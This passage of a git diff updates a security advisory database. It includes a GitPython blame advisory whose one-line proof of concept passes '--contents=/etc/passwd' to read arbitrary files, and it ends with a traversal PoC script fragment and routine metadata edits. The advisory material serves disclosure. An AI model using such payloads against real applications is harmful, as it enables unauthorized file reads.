print(\"wrote git directory outside dest (sentinel) =\", wrote_outside)\n print(\"dest/.git gitlink points outside dest =\", gitlink_points_outside)\n\n if wrote_outside and gitlink_points_outside:\n print(\"VULNERABLE: git directory created at attacker-controlled path \"\n f\"outside the clone destination: {target_gitdir}\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: sentinel not observed\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78677" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2210" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/b68afff45af0f49e79a3e2d2162018986b37ad5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3787.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-78678.json b/advisories/BREW-fdroidserver-CVE-2026-78678.json index e86b15e9028..3e8e28a3c8e 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-78678.json +++ b/advisories/BREW-fdroidserver-CVE-2026-78678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-78678", "published": "2026-09-04T08:59:24Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "PYSEC-2026-3788", "CVE-2026-78678", @@ -52,21 +52,34 @@ } ] }, - "details": "GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.", + "summary": "GitPython: Incomplete unsafe_git_revision_options denylist omits --contents/-S, enabling arbitrary file read via Repo.blame()", + "details": "## Summary\n`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents ` and `-S `, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).\n\n## Root Cause\n`unsafe_git_revision_options = [\"--output\",\"-o\"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.\n\n## Impact\nArbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nresult = repo.blame(\"--contents=/etc/passwd\", \"a.txt\")\n# result rows carry the victim file's line text\n```\n\n## Attack Chain\n1. Entry: app calls `repo.blame(rev, file)` with attacker `rev=\"--contents=/etc/passwd\"` (or kwarg `contents=\"/etc/passwd\"`, or `-S`).\n2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `[\"--output\",\"-o\"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.\n3. Sink: `self.git.blame(rev, \"--\", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=','HEAD','--','a.txt']`.\n4. Impact: blame result rows carry the victim file's line text.\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.\n\n## Affected Versions\n`GitPython <= 3.1.58` (denylist present verbatim on the latest release tag).\n\n## Suggested Fix\nPrefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule \"the option takes a filesystem path\" rather than \"the option writes output\".\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78678" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3788.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" } ] } diff --git a/advisories/BREW-git-annex-CVE-2014-6274.json b/advisories/BREW-git-annex-CVE-2014-6274.json index cd2de48bf7a..73d3a2f1533 100644 --- a/advisories/BREW-git-annex-CVE-2014-6274.json +++ b/advisories/BREW-git-annex-CVE-2014-6274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-CVE-2014-6274", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0013", "CVE-2014-6274" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", @@ -56,8 +56,8 @@ "strategy": "distro", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "upstream:pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "upstream:pkg:hackage/git-annex@10.20260901" } ] }, diff --git a/advisories/BREW-git-annex-CVE-2017-12976.json b/advisories/BREW-git-annex-CVE-2017-12976.json index 20f4ec7d700..17a11eb49b2 100644 --- a/advisories/BREW-git-annex-CVE-2017-12976.json +++ b/advisories/BREW-git-annex-CVE-2017-12976.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-CVE-2017-12976", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0009", "CVE-2017-12976" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", @@ -56,8 +56,8 @@ "strategy": "distro", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "upstream:pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "upstream:pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", diff --git a/advisories/BREW-git-annex-CVE-2018-10857.json b/advisories/BREW-git-annex-CVE-2018-10857.json index 01e2a3b0962..cd99dd64f88 100644 --- a/advisories/BREW-git-annex-CVE-2018-10857.json +++ b/advisories/BREW-git-annex-CVE-2018-10857.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-CVE-2018-10857", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0010", "CVE-2018-10857" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", @@ -56,8 +56,8 @@ "strategy": "distro", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "upstream:pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "upstream:pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", diff --git a/advisories/BREW-git-annex-CVE-2018-10859.json b/advisories/BREW-git-annex-CVE-2018-10859.json index da9544c9df3..1c26974c449 100644 --- a/advisories/BREW-git-annex-CVE-2018-10859.json +++ b/advisories/BREW-git-annex-CVE-2018-10859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-CVE-2018-10859", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0011", "CVE-2018-10859" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", @@ -56,8 +56,8 @@ "strategy": "distro", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "upstream:pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "upstream:pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", diff --git a/advisories/BREW-git-annex-HSEC-2023-0012.json b/advisories/BREW-git-annex-HSEC-2023-0012.json index c59bf35b8ac..58f6e2804ac 100644 --- a/advisories/BREW-git-annex-HSEC-2023-0012.json +++ b/advisories/BREW-git-annex-HSEC-2023-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-HSEC-2023-0012", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0012" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" } ] }, diff --git a/advisories/BREW-hf-CVE-2016-10075.json b/advisories/BREW-hf-CVE-2016-10075.json index 755d660ced4..cda41a9d984 100644 --- a/advisories/BREW-hf-CVE-2016-10075.json +++ b/advisories/BREW-hf-CVE-2016-10075.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2016-10075", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-r7q7-xcjw-qx8q", "CVE-2016-10075", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2017-18342.json b/advisories/BREW-hf-CVE-2017-18342.json index 02e2780b7c9..d609061773a 100644 --- a/advisories/BREW-hf-CVE-2017-18342.json +++ b/advisories/BREW-hf-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2017-18342", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2019-20477.json b/advisories/BREW-hf-CVE-2019-20477.json index 543768ff0a8..484884d4143 100644 --- a/advisories/BREW-hf-CVE-2019-20477.json +++ b/advisories/BREW-hf-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2019-20477", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2020-14343.json b/advisories/BREW-hf-CVE-2020-14343.json index 11fcb383ac4..d7a04bb5a6f 100644 --- a/advisories/BREW-hf-CVE-2020-14343.json +++ b/advisories/BREW-hf-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2020-14343", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2020-1747.json b/advisories/BREW-hf-CVE-2020-1747.json index d8d90b8395e..bb067142737 100644 --- a/advisories/BREW-hf-CVE-2020-1747.json +++ b/advisories/BREW-hf-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2020-1747", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2021-41945.json b/advisories/BREW-hf-CVE-2021-41945.json index 773faa6bc34..534d2272d92 100644 --- a/advisories/BREW-hf-CVE-2021-41945.json +++ b/advisories/BREW-hf-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2021-41945", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2024-34062.json b/advisories/BREW-hf-CVE-2024-34062.json index b03f61aacd6..fdd6311e6dd 100644 --- a/advisories/BREW-hf-CVE-2024-34062.json +++ b/advisories/BREW-hf-CVE-2024-34062.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2024-34062", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-g7vv-2v7x-gj9p", "CVE-2024-34062", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2024-3651.json b/advisories/BREW-hf-CVE-2024-3651.json index 6297d81fb1b..80abb35740d 100644 --- a/advisories/BREW-hf-CVE-2024-3651.json +++ b/advisories/BREW-hf-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2024-3651", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-20T09:00:33Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2025-43859.json b/advisories/BREW-hf-CVE-2025-43859.json index 6998f3f65ac..b686f616116 100644 --- a/advisories/BREW-hf-CVE-2025-43859.json +++ b/advisories/BREW-hf-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2025-43859", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2025-68146.json b/advisories/BREW-hf-CVE-2025-68146.json index edccb4583f9..17049de106b 100644 --- a/advisories/BREW-hf-CVE-2025-68146.json +++ b/advisories/BREW-hf-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2025-68146", "published": "2026-08-13T16:56:26Z", - "modified": "2026-09-05T09:04:43Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.5", - "key": "pkg:pypi/filelock@3.32.5", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2026-22701.json b/advisories/BREW-hf-CVE-2026-22701.json index 5a01c2715d5..b0622f2cb30 100644 --- a/advisories/BREW-hf-CVE-2026-22701.json +++ b/advisories/BREW-hf-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2026-22701", "published": "2026-08-13T16:56:26Z", - "modified": "2026-09-05T09:04:43Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.5", - "key": "pkg:pypi/filelock@3.32.5", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2026-45409.json b/advisories/BREW-hf-CVE-2026-45409.json index 9b7b964e323..6f8ad888268 100644 --- a/advisories/BREW-hf-CVE-2026-45409.json +++ b/advisories/BREW-hf-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2026-45409", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-20T09:00:33Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2014-1829.json b/advisories/BREW-pulp-cli-CVE-2014-1829.json index 41bbfaa5dad..9b40bd68322 100644 --- a/advisories/BREW-pulp-cli-CVE-2014-1829.json +++ b/advisories/BREW-pulp-cli-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2014-1829", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2014-1830.json b/advisories/BREW-pulp-cli-CVE-2014-1830.json index c4e91d8cd97..f4476479541 100644 --- a/advisories/BREW-pulp-cli-CVE-2014-1830.json +++ b/advisories/BREW-pulp-cli-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2014-1830", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2015-2296.json b/advisories/BREW-pulp-cli-CVE-2015-2296.json index 414fbab225c..4608bcfa8dd 100644 --- a/advisories/BREW-pulp-cli-CVE-2015-2296.json +++ b/advisories/BREW-pulp-cli-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2015-2296", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2016-9015.json b/advisories/BREW-pulp-cli-CVE-2016-9015.json index 2e816d016ee..b326a707162 100644 --- a/advisories/BREW-pulp-cli-CVE-2016-9015.json +++ b/advisories/BREW-pulp-cli-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2016-9015", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2017-18342.json b/advisories/BREW-pulp-cli-CVE-2017-18342.json index 9adb7624bb9..eb2913ac375 100644 --- a/advisories/BREW-pulp-cli-CVE-2017-18342.json +++ b/advisories/BREW-pulp-cli-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2017-18342", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2018-18074.json b/advisories/BREW-pulp-cli-CVE-2018-18074.json index 68effdf3e6d..bb468b4948c 100644 --- a/advisories/BREW-pulp-cli-CVE-2018-18074.json +++ b/advisories/BREW-pulp-cli-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2018-18074", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2018-20060.json b/advisories/BREW-pulp-cli-CVE-2018-20060.json index bcfbb4ec374..4f0167f96bc 100644 --- a/advisories/BREW-pulp-cli-CVE-2018-20060.json +++ b/advisories/BREW-pulp-cli-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2018-20060", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2018-25091.json b/advisories/BREW-pulp-cli-CVE-2018-25091.json index c5463bc0f68..d443cb97b4a 100644 --- a/advisories/BREW-pulp-cli-CVE-2018-25091.json +++ b/advisories/BREW-pulp-cli-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2018-25091", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2019-11236.json b/advisories/BREW-pulp-cli-CVE-2019-11236.json index c994d4b660b..e84cd83a7e7 100644 --- a/advisories/BREW-pulp-cli-CVE-2019-11236.json +++ b/advisories/BREW-pulp-cli-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": 